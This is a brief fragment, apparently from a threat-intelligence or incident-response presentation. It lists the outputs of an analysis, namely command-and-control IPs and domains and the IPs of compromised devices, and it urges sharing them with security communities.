Then you produce these
CC IPs domain names (within and outside your
network)
IPs of compromised devices (within and outside
your network)
We highly suggest collaborating with your
communities of choice to share the above
information!